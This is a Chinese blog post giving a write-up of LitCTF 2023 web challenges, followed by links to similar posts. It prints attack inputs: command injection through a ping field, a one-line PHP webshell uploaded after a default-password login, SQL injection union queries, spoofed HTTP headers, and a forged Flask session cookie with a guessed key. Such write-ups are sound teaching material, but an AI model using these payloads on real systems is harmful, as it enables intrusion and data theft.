LitCTF 2023-WEB部分wp

已于 2023-10-12 22:21:24 修改
阅读量260 收藏 1
点赞数 1
文章标签: 前端 java web安全 javascript
于 2023-10-12 20:36:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74606212/article/details/133798787
版权

我Flag呢?

直接查看源代码

PHP是世界上最好的语言!! 

直接命令执行

<?php system('ls /'); ?>

<?php system('cat /flag'); ?>

导弹迷踪

查看js

1zjs

访问f@k3f1ag.php 

 密码的jsfuck

CTF在线工具-在线JSfuck加密|在线JSfuck解密|JSfuck|JSfuck原理|JSfuck算法 (hiencode.com)

Ping

随便传个 

 看一下源代码

发现只能输ip

我们尝试一下抓包 

command=127.0.0.1;ls /&ping=Ping

command=127.0.0.1;cat /flag&ping=Ping

Follow me and hack me

?CTF=Lit2023

 

Challenge=i'm_c0m1ng

 

作业管理系统

看一下源代码

账号admin

密码admin 

 

上传一句话木马

<?php
@eval($_POST['1']);
?>

蚁剑连接,找到/flag

 

Http pro max plus

 抓包

X-Forwarded-For: 127.0.0.1

不行就换一个

Client-Ip: 127.0.0.1

Referer:pornhub.com

User-Agent:Chrome

 

 

 百度了一下

via
通过请求中的"Via"字段,可以获取有关请求的中间代理服务器的信息。

"Via"字段是一个可选的HTTP请求头字段,其中包含了代理服务器的相关信息。当请求经过一个或多个代理服务器时,每个代理服务器都会向"Via"字段添加自己的标识。这样做的目的是提供有关请求路径的信息,以便于调试、故障排查和确定请求的来源。

"Via"字段通常采用以下的格式:

Via: [protocol-name]/[protocol-version] [proxy-node-name] ([proxy-node-IP]:[proxy-en-port]) 其中:

[protocol-name] 表示使用的协议,比如 "HTTP" 或 "HTTPS"。

[protocol-version] 表示协议的版本号,比如 "1.1"。

[proxy-node-name] 表示代理服务器的名称,可以是一个标识符或主机名。

[proxy-node-IP] 表示代理服务器的IP地址。

[proxy-node-port] 表示代理服务器的端口号。

其实我们在伪造的时候只需要直接添加代理服务器的名称就行了

 访问/wtfwtfwtfwtf.php

看一下源代码

 访问

/sejishikong.php

Vim yyds

inux下vi/vim异常关闭是会存留.swp文件

方法:提示vim异常关闭,访问url/.index.php.swp,得到flag。

打开文件,关键点

<?php
            error_reporting(0);
            $password = "Give_Me_Your_Flag";
            echo "<p>can can need Vim </p>";
            if ($_POST['password'] === base64_encode($password)) {
                echo "<p>Oh You got my password!</p>";
                eval(system($_POST['cmd']));
            }
            ?>
Give_Me_Your_Flag
base64编码:R2l2ZV9NZV9Zb3VyX0ZsYWc=

payload:

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=ls /

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag

 

这是什么?SQL !注一下 ! 

这题看大佬的wp

查看所有库(记得在url传)

?id=-1)))))) union select schema_name,2 from information_schema.schemata%23

 这里查ctftraing库

-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema='ctftraining'%23

查看flag(经过测试,发现了table_schema只是内置库的字段,我们这里指定数据库查询应该用:库名.表名的形式)

-1)))))) union select flag,2 from ctftraining.flag%23

Flag点击就送!

看其他师傅的wp说是session伪造 

flask框架的session是存储在客户端的,那么就需要解决session是否会被恶意纂改的问题,而flask通过一个secret_key,也就是密钥对数据进行签名来防止session被纂改。

猜测Key为LitCTF测试一下

python flask_session_cookie_manager3.py encode -s 'LitCTF' -t '{"name":"admin"}'
eyJuYW1lIjoiYWRtaW4ifQ.ZGDo5g.cfMl5HdMqtOYD5nqQaUTmj-xNdc
orzw
关注
2023LitCTF webwp
m0_74160536的博客
05-17 1384
1、导弹迷踪2、1zjs3、php是世界上最好的语言!!4、Ping5、我Flag呢?7、作业管理系统8、Vim yyds10、这是什么?SQL!注一下!11、Flag点击就送!12、就当无事发生13、彩蛋。
[LitCTF 2023]Flag点击就送!--session伪造
qq_75120258的博客
04-18 1333
由于http协议是一个无状态的协议,也就是说同一个用户第一次请求和第二次请求是完全没有关系的,但是现在的网站基本上有登录使用的功能,这就要求必须实现有状态,而session机制实现的就是这个功能。 用户第一次请求后,将产生的状态信息保存在session中,这时可以把session当做一个容器,它保存了正在使用的所有用户的状态信息;这段状态信息分配了一个唯一的标识符用来标识用户的身份,将其保存在响应对象的cookie中;当第二次请求时,解析cookie中的标识符,拿到标识符后去session找到对应的用户的信
[LitCTF 2023]Http pro max plus
m0_73612768的博客
12-29 1401
http 请求;XFF 头;Client-Ip 头;Referer 头;User-Agent 头;Via 头;
[LitCTF2023] web方向全题解wp
Leaf_initial的博客
05-14 2942
签到题,f12获取flag这里注意看一下源代码,有彩蛋先留着。
LitCTF部分WP
qq_44209092的博客
05-21 390
LitCTF部分WP
LitCTF2024 web方向题解
5fn
08-12 1403
LitCTF2024 web方向的题做完了。这里奉上题解一份。题解是比较小白方向的。刚入门web安全的可以去做一下。LitCTF的题其实都很适合新手练手,非常推荐新手入门食用。 结合NSSCTF靶场,每道题上都有考查方向。
探姬杯LitCTF2024(Web方向)
Zue3r的博客
06-02 1009
探姬杯LitCTF2024(Web方向)
NSS题目练习4
cyy001128的博客
05-27 691
Client-IP: - Client-IP是另一个用于传递客户端IP地址的HTTP请求头字段,但并不如X-Forwarded-For常用。Referer请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。[protocol-name] 表示使用的协议,比如 "HTTP" 或 "HTTPS"。[proxy-node-name] 表示代理服务器的名称,可以是一个标识符或主机名。通过请求中的"Via"字段,可以获取有关请求的中间代理服务器的信息。
[LitCTF 2023]Follow me and hack me
kuzemax的博客
08-18 295
[LitCTF 2023] Web类题目分享
网安日记本的博客
01-18 3861
[LitCTF 2023] Web类题目做法及思路解析(个人解析)
[LitCTF 2023]NSSCTF Follow me and hack me
2302_81393479的博客
02-13 812
首先我们可以看到题目叫我们试试用GET传参一个变量名为CTF 值为Lit2023。可以看到按钮是点击不了的,下面写着提示GET涅?题目叫我们分别用GET和POST传两个变量。然后分别依次点击Load url、Split url、Execute ,并且点击post。然后按F12打开开发者工具这一栏就可以看到hackbar,现在就可以使用。然后我们可以看到提示变成了POST呢?这时我们就可以用POST传变量了。在浏览器的右上角点击打开应用程序菜单,再打开扩展和主题。然后搜索hackbarv2就可以下载。
LITCTF2023 部分WP
arcuied
05-14 1769
LITCTF2023 部分WP
nssctf习题[LitCTF]Follow me and hack me解题思路
qq_59032809的博客
12-10 507
这时候就需要用到Hackbar插件(新版火狐中的Hackbar插件不知道为什么一直无法提交成功,我用的是旧版的)提交成功后就得出答案了,这道题还有彩蛋,有兴趣的可以自己去挖一挖。题目让我们试试get传一个CTF=Lit2023的参数。post没有上传,所以得不到答案。get可以在浏览器地址栏中上传参数。
LitCTF-web方向
konpure的博客
12-24 493
接下来用脚本对admin进行伪造,密钥猜测为"LitCTF"(看wp知道的,也可以用脚本对密钥进行爆破,不过没有任何已知条件的情况下,六位的密钥爆破完不知道要花多久)CTF=Lit2023后跳转,然后用bp抓包,用post方式提交Challenge=i’m_c0m1ng,得到flag(使用hackbar更加方便,但我的hackbar还在因不明原因无法正常使用)根据该语句尝试拼接并开始爆库,爆表,爆列,爆值,一路爆下去,得到flag。于是根据该代码用bp抓包并构造语句,以post的方式上传,得到flag。
BaseCTF-Web-Week4-WP
最新发布
03-21
好的,我需要处理用户关于BaseCTF Web Week4解题思路的请求。首先,用户提到了BaseCTF高校联合新生赛Week1和一篇关于UPX脱壳的博客,但实际需要的是Week4的Web题解。这可能存在混淆,我需要先确认是否存在Week4的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值